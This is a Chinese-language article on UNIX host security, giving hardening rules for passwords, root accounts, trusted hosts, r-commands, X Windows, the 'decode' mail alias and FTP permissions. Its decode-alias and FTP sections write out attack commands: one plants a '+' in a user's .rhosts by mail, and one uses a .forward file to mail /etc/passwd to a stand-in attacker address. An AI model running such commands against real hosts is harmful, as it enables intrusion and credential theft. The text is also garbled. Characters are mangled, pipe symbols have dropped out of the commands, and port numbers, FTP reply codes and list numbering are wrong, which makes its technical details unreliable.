投磚引玉話主機安全，打造安全主機

隨著計算機在各行各業(yè)應用的深入和普及， 各類社會、經濟、政治、國防等重要信息大量的在計算機中存儲和網絡中傳輸。 計算機信息系統(tǒng)已經逐步成為整個國家政府機構運轉的命脈。 社會的計算機化產生了一種新的社會資產， 而這個信息資產由兩部分組成一部分是計算機信息系統(tǒng)資源-各種硬件、軟件、固件以及相關文檔資料、配套設備、設施、系統(tǒng)服務等;另一種則是系統(tǒng)生產和擁有的、存儲的電子信息資源， 可能包括統(tǒng)計報表、科技資料、設計圖紙、實驗數據、各類計劃、決策等。

　　信息安全按其載體類型， 主要分為網絡安全和主機安全。 網絡安全控制上網擁護能安全可靠地到達網絡什么地方以及如何傳輸， 訪問哪些數據以某種方式等等。 而主機安全則控制系統(tǒng)用戶能否進入系統(tǒng)以及進入后能訪問哪些資源。 這其中包括操作系統(tǒng)安全、應用程序安全、數據安全、用戶安全等。

　　目前國內外主流的服務器如IBM RS6000/HP N4000等均采用UNIX系統(tǒng)來做為其應用的平臺， 如ANSOFT/Mentor/UG等大型工程用軟件也都采用其做為其主要開發(fā)平臺。 本人在和政府、軍工等客戶長期的溝通過程中發(fā)現， 此類服務器通常處于一個非常重要的位置， 卻在安全性上很容易被忽視。 于是如何解決此類UNIX主機的安全問題， 盡量的降低安全風險就成為了一個不可不說的話題。

　　1 口令安全性規(guī)則

　　通過口令進行身份認證是目前實現計算機安全的主要手段之一， 一個用戶的口令被非法用戶獲悉， 則該非法用戶即獲得了該用戶的全部權限， 這樣， 尤其是高權限用戶的口令泄露以后， 主機和網絡也就隨即失去了安全性。 系統(tǒng)管理員以及其它所有用戶對口令選取應采取負責的態(tài)度， 消除僥幸和偷懶思想。 具體來說應遵循以下一些規(guī)則：

　　口令長度不要小于6位， 并應同時包含字母和數字， 以及標點符號和控制字符。

　　口令中不要使用常用單詞(避免字典攻擊)、英文簡稱、個人信息(如生日、名字、反向拼寫的登錄名、房間中可見的東西)、年份以及機器中的命令等， 不要在不同系統(tǒng)上， 特別是不同級別的用戶上使用同一口令。

　　定期改變口令。

　　系統(tǒng)安裝對口令文件進行隱藏的程序或設置(例如Shadow Suite for linux)。

　　系統(tǒng)配置對用戶口令設置情況進行檢測的程序， 并強制用戶定期改變口令， 任何一個用戶口令的脆弱， 都會影響整個系統(tǒng)的安全性。

　　2 超級用戶唯一性規(guī)則

　　超級用戶對于系統(tǒng)的一切文件都有進行所有操作的權利。 但是最大的自由相應地也需要承擔最大的風險， 如果超級用戶權限被黑客得到， 將對整個系統(tǒng)帶來毀滅性的打擊。 為了減少超級用戶被破譯的可能性， 必須將系統(tǒng)中多余的超級用戶刪除， 在一個系統(tǒng)中只存在一個超級用戶是每個系統(tǒng)管理員必須遵守的原則。

　　超級用戶可以從/etc/passwd文件中查出， 超級用戶的user ID為0， 但是group ID稍有不同， 在不同的系統(tǒng)版本里分別有兩種形式：0或1。 當/etc/passwd文件中有多于兩個用戶項為：用戶名:x:0:0或用戶名:x:0:1時， 就必須遵照唯一性規(guī)則進行改正。

　　3 禁用Trusted主機(被信任主機)規(guī)則

　　在實際工作中， 系統(tǒng)管理員為方便與其他主機進行數據傳輸、軟硬件資源共享和r服務(如rlogin、rsh等遠程系統(tǒng)調用命令)， 往往在/etc/hosts.equiv文件中設置遠程主機名， 以此確認該主機為Truseted主機。 這樣， 一個被信任主機可以不需口令地訪問系統(tǒng)及調用r服務。 更有甚者， 某些系統(tǒng)管理員在/etc/hosts.equiv文件內設置"+"符號， 雖然這個參數可以方便所有遠程訪問， 但同樣方便了黑客。 因為這會使任何一臺主機上的任何用戶都可以不需口令地訪問系統(tǒng)， 對系統(tǒng)安全造成很大的損害。

　　同樣， .rhosts文件也提供了Trusted主機和r命令訪問功能。 但它比/etc/hosts.equiv文件可能會導致更大的安全漏洞。 因為系統(tǒng)內的任何用戶都可能在各自的$HOME目錄下創(chuàng)建該文件。 那么.rhosts文件中指定的遠程主機上的用戶在以該用戶名登錄本地主機系統(tǒng)時， 不需口令認證。 特別是在.rhosts 文件內設置"+"符號的情形， 更會使任何一臺主機上的任何用戶都可以不需口令地訪問本系統(tǒng)的這個用戶， 從而導致安全漏洞的出現。

　　為安全計， 如果無特殊需要， 應該清除一切Trusted主機相關配置。

　　4 禁用r命令規(guī)則

　　r命令是由Berkley開發(fā)的一系列命令軟件， 由于這些命令如rlogin、rsh、rcp、rdist等均以"r"開頭， 因此統(tǒng)稱為r命令。

　　r命令固有的弱點包括：任何口令都是未經加密的， 如果有人對網絡進行竊聽， 很容易發(fā)現口令;整個r命令對話都是未經加密的， 對話中的每一個字符(包括口令)很容易被記錄下來;系統(tǒng)管理員為管理方便， 經常使用rlogin等命令從遠程登錄來調試Web服務器的設置， 形成潛在的安全漏洞。

　　為安全計， 如果無特殊需要， 應該在路由器上或主機/etc/inetd.conf文件內過濾掉5110、513和514(TCP)端口， 這樣可阻止主機外部用戶使用r命令。

　　5 禁用X Windows 規(guī)則

　　X Windows系統(tǒng)是一種客戶機/服務器結構的窗口系統(tǒng)， 每個擁有顯示設備的主機系統(tǒng)都可以作為服務器， 并可接受另一個主機系統(tǒng)作為其客戶。 它的運行模式是：程序在客戶機系統(tǒng)上運行， 而用戶界面卻顯示在服務器的顯示設備上， 客戶機通過網絡把應該顯示出來的內容傳送給服務器， 服務器則把用戶的輸入通過網絡傳送給客戶機。

　　和r命令一樣， 所有的X Windows 傳輸內容都是不加密的， 并且它的身份驗證功能也不夠強大， 容易喪失作用(如"xhost +"命令)。

　　為安全計， 如果無特殊需要， X Windows設置可以認為是不必要的。

　　6 禁用/etc/aliases中的"decode"別名規(guī)則

　　如果系統(tǒng)管理員沒有將/etc/aliases文件內以decode別名起始的一行注釋掉， 那么該主機允許decode別名。 若用戶zy主目錄(如/export/home/zy)下的 .rhosts文件對daemon(smtp服務器通常以daemon用戶身份運行)可寫， 即有：

　　sun%echo "+" uuencode /export/home/zy/.rhosts mail decode@ngcc.com

　　在該例中， 本地的uuencode程序生成一個編碼流， 文件名為"/export/home/zy/.rhosts "， 內容為一個"+"， 并作為電子郵件發(fā)給ngcc.com上的decode別名。 ngcc.com收到該郵件后， 把這個編碼流重定向到解碼程序uudecode， uudecode則恢復文件內容， 并試圖把它存為/export/home/zy/.rhosts。 如果daemon對/export/home/zy/目錄有寫權限， 則上述命令執(zhí)行成功。 于是/export/home/zy/.rhosts中就出現一個"+"， 這正是攻擊者需要的。

　　為安全計， 應該禁用/etc/aliases中的"decode"別名。

　　7 審核文件和目錄權限規(guī)則

　　(1)FTP的根目錄

　　FTP的根目錄不同于主機系統(tǒng)的根目錄， 所以FTP下看到的/etc/passwd和系統(tǒng)的/etc/passwd不是一個文件， 但有些不稱職的系統(tǒng)管理員在創(chuàng)建FTP目錄結構時會把系統(tǒng)的/etc/passwd文件直接拷貝過來， 這就會給黑客以可乘之機。

　　FTP的根目錄是在系統(tǒng)的/etc/passwd文件中指定的， 也就是用匿名FTP登錄到主機后的起始目錄。

　　例如：事先編寫forward_sucker_file shell腳本， 內容為：

　　sun% cat forward_sucker_file

　　" /bin/cat /etc/passwd sed 's/^/ /' /bin/mail me@my.e-mail.addr"

　　通過FTP將forward_sucker_file腳本傳送到目標主機(如ngcc.com)

　　sun% ftp ngcc.com

　　Connected to ngcc.com

　　10100 victim FTP server ready.

　　Name (ngcc.com:zy): ftp

　　331 Guest login ok, send ident as password.

　　Password: [輸入電子郵件地址]

　　1030 Guest login ok, access restrictions apply.

　　ftp> put forward_sucker_file .forward

　　43 bytes sent in 0.0015 seconds (108 Kbytes/s)

　　ftp> quit

　　將passwd文件內容發(fā)送到黑客郵件地址：

　　sun% echo test mail ftp@ngcc.com

　　如果匿名FTP主目錄可寫， 可以在其下投放一個".forward"文件;文件內容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉發(fā)的：如果某一用戶(此處為ftp)的主目錄下有這個文件， 那么當該用戶收到郵件時， 就要視".forward"的內容進行轉發(fā)。 如果".forward"的內容為一些電子郵件地址， 該郵件就被轉發(fā)到這些地址;而如果為一行用雙引號引起來的Shell命令， 則該郵件的內容被重定向到此命令。 此處， 命令為：" /bin/cat /etc/passwd sed 's/^/ /' /bin/mail me@my.e-mail.addr"， 實際上對重定向過來的作為輸入的郵件內容沒有做任何處理， 而是把/etc/passwd(為了防止被安全機制過濾， 先在每一行行首增加一個空格)發(fā)到了攻擊者的電子郵件地址(me@my.e-mail.addr)。 因此， 在投放了這樣一個".forward"文件后， 再隨便發(fā)一封電子郵件給victim.com上的FTP用戶， 通過"轉發(fā)"功能， ngcc.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上。

　　(10)其他文件和目錄

　　確保沒有其他文件和目錄被FTP用戶或所在的組擁有所有權(ownered by ftp account and ftp group);否則， 黑客可能借助特洛伊木馬程序對合法文件進行替代， 構成漏洞隱患。

　　除了~/ftp/incoming目錄外， 匿名(anonymous)FTP 用戶在其他目錄下不能創(chuàng)建任何文件和子目錄。

　　文件和目錄權限修改要慎重：對于系統(tǒng)或CERT組織推薦的有關特定文件的讀寫權限， 如/var/adm/utmpx和/var/adm/wtmpx文件權限應該為644， 不要輕易修改。 一般情況下， 擁有對任何文件和目錄具有寫權限的用戶只能是超級用戶， 進一步說， 如果一個文件或目錄可寫， 則可寫者只能為超級用戶